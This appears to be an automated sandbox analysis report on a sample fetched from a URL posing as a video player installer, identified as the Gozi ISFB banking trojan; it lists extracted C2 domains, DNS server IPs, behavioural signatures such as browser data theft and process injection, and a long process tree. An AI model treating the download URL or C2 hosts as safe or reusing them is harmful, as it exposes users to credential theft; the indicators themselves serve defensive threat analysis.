Analysis
-
max time kernel
1203s -
max time network
1194s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
16-08-2021 19:12
General
-
Target
http://ntv-play.com/video/04169823/tls/console-play.exe
-
Sample
210816-ehaj4hbq12
Score
10/10
Malware Config
Extracted
Family
gozi_ifsb
Botnet
1001
C2
updates.esset.com
jensjen.in
strongbilt.cc
drauduburr.ws
besstrown.cn
druckenshtalen.mn
grantedii.co
loudam62.tk
libricee.in
burbasoftw.pw
waiseen.io
trumphujtebevrot.bit
ymxslfmppjcvwkrjtfnr.co
ohnjjxasfxgxiakhtohn.in
hnhccsotdqftyicvossk.at
xcgrdxcmfirfvignnfea.ws
umvwdtbenbinronbohcc.pw
Attributes
-
dga_season
10
-
dns_servers
107.174.86.134
107.175.127.22
-
exe_type
worker
-
server_id
12
rsa_pubkey.plain
serpent.plain
Signatures
-
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 27 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 27 IoCs
-
Suspicious use of AdjustPrivilegeToken 45 IoCs
-
Suspicious use of FindShellTrayWindow 14 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://ntv-play.com/video/04169823/tls/console-play.exe2⤵
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa10b94f50,0x7ffa10b94f60,0x7ffa10b94f703⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3596 -s 6724⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 7924⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5276 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5092 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6724 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6216 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings3⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff66ae5a890,0x7ff66ae5a8a0,0x7ff66ae5a8b04⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7148 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5692 /prefetch:83⤵
-
C:\Users\Admin\Downloads\console-play.exe"C:\Users\Admin\Downloads\console-play.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp"C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp" /SL5="$601F0,5898797,953344,C:\Users\Admin\Downloads\console-play.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Downloads\console-play.exe"C:\Users\Admin\Downloads\console-play.exe" /VERYSILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp"C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp" /SL5="$301F8,5898797,953344,C:\Users\Admin\Downloads\console-play.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6892 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5692 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6600 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6020 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6348 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7716 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3580 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4232 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7444 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4124 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8064 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7676 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6636 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8092 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7052 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5148 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8104 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:83⤵
-
